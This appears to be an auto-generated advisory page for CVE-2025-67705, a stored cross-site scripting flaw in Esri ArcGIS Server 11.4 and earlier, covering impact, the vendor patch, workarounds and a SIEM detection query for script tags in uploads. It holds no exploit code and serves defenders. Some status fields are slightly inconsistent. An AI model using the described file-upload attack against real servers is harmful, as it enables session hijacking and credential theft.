CVE-2025-67705 – A stored cross-site scripting vulnerability in ... (How to Fix)

Q: What is the severity of CVE-2025-67705?

CVE-2025-67705 has a CVSS score of 6.1 (MEDIUM). A stored cross-site scripting vulnerability in Esri ArcGIS Server allows attackers to upload malicious files that execute JavaScript in victims' browsers when accessed. This affects ArcGIS Server 11.4 and earlier versions on both Windows and Linux operating systems.

📋 TL;DR

A stored cross-site scripting vulnerability in Esri ArcGIS Server allows attackers to upload malicious files that execute JavaScript in victims' browsers when accessed. This affects ArcGIS Server 11.4 and earlier versions on both Windows and Linux operating systems.

💻 Affected Systems

Products:

Esri ArcGIS Server

Versions: 11.4 and earlier

Operating Systems: Windows, Linux

Default Config Vulnerable: ⚠️ Yes

Notes: Vulnerability exists in some configurations that allow file uploads; not all deployments may be affected depending on specific setup.

📦 What is this software?

Arcgis Server by Esri

View all CVEs affecting Arcgis Server →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Attackers could steal session cookies, perform actions as authenticated users, redirect to malicious sites, or install malware on client systems.

🟠

Likely Case

Session hijacking, credential theft, or defacement of web applications using the vulnerable ArcGIS Server.

🟢

If Mitigated

Limited impact if proper input validation and output encoding are implemented, though the vulnerability still exists at the server level.

🌐 Internet-Facing: HIGH

🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: UNKNOWN

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

Attack requires ability to upload files to the server, but no authentication is needed in vulnerable configurations.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Apply Security 2025 Update 2 Patch

Vendor Advisory: https://www.esri.com/arcgis-blog/products/trust-arcgis/administration/arcgis-server-security-2025-update-2-patch

Restart Required: Yes

Instructions:

1. Download the Security 2025 Update 2 patch from Esri's support site. 2. Stop ArcGIS Server services. 3. Apply the patch according to Esri's installation instructions. 4. Restart ArcGIS Server services. 5. Verify the patch was successfully applied.

🔧 Temporary Workarounds

Disable File Upload Functionality

all

Restrict or disable file upload capabilities in ArcGIS Server configurations to prevent exploitation.

Modify ArcGIS Server configuration files to remove or restrict upload endpoints

Implement Web Application Firewall Rules

all

Configure WAF to block malicious file uploads and XSS payloads.

Add WAF rules to detect and block suspicious file upload patterns and script tags

🧯 If You Can't Patch

Implement strict input validation and output encoding for all user-supplied content
Deploy network segmentation to isolate ArcGIS Server from internet access

🔍 How to Verify

Check if Vulnerable:

Check ArcGIS Server version and compare against affected versions (11.4 and earlier). Review configuration for file upload capabilities.

Check Version:

Check ArcGIS Server Administrator Directory or management console for version information

Verify Fix Applied:

Verify that Security 2025 Update 2 patch is installed and test file upload functionality with XSS payloads to confirm they are blocked.

📡 Detection & Monitoring

Log Indicators:

Unusual file upload activity
Requests containing script tags or JavaScript in file uploads
Access to uploaded files with suspicious extensions

Network Indicators:

HTTP POST requests to file upload endpoints with malicious payloads
Subsequent requests to uploaded malicious files

SIEM Query:

source="arcgis_server" AND (url="*upload*" OR method="POST") AND (content="<script>" OR content="javascript:")

📊 Metadata

CVE ID: CVE-2025-67705

CVSS v3 Score: 6.1 (MEDIUM)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

CWE: CWE-79

EPSS Score: 0.05% exploit probability (14.4th percentile)

Published: December 31, 2025

Last Updated: January 6, 2026

🔗 References

https://www.esri.com/arcgis-blog/products/trust-arcgis/administration/arcgis-server-security-2025-update-2-patch Patch,Vendor Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2025-67705, you might also want to check these: